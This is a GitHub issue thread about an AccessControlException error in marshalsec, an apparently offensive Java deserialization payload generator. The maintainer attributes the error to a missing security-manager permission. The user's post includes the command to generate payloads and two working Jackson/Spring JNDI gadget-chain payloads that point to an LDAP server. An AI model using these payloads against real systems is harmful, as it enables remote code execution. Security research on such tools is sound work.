search

mbechler / marshalsec

MIT License
3.39k stars 680 forks source link

Java access denied error #12

Closed S3cur3Th1sSh1t closed 4 years ago

S3cur3Th1sSh1t commented 4 years ago

Hi,

im currently trying to generate/test all payloads for the Jackson Marshaller with the following command:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a

The first two payloads are shown but then i always get Exception messages telling that the java Access for System Modules is denied. Also tried running as root, seams to be a java policy/configuration problem. Also tried different systems, same behaviour.

Do i have to change the default java configuration to get all payloads generated or am i missing some argument for the tool?

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a

["org.springframework.beans.factory.config.PropertyPathFactoryBean",{"targetBeanName":"ldap://localhost:1389/obj","propertyPath":"foo","beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389/obj"]}]}]

["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389/obj"]}],"adviceBeanName":"ldap://localhost:1389/obj"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]]
java.lang.reflect.InvocationTargetException
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.base/java.lang.reflect.Method.invoke(Method.java:564)
        at marshalsec.MarshallerBase.createObject(MarshallerBase.java:331)
        at marshalsec.MarshallerBase.doRun(MarshallerBase.java:165)
        at marshalsec.MarshallerBase.runAll(MarshallerBase.java:147)
        at marshalsec.MarshallerBase.run(MarshallerBase.java:115)
        at marshalsec.Jackson.main(Jackson.java:289)
Caused by: java.security.AccessControlException: access denied ("java.lang.RuntimePermission" "accessSystemModules")
        at java.base/java.security.AccessControlContext.checkPermission(AccessControlContext.java:472)
        at java.base/java.security.AccessController.checkPermission(AccessController.java:895)
        at java.base/java.lang.SecurityManager.checkPermission(SecurityManager.java:335)
        at marshalsec.SideEffectSecurityManager.checkPermission(SideEffectSecurityManager.java:76)
        at java.base/jdk.internal.module.SystemModuleFinders$SystemModuleReader.checkPermissionToConnect
mbechler commented 4 years ago

Just a missing permission in the security manager used to check that no strange things happen during serialization. Should by fixed. Thanks.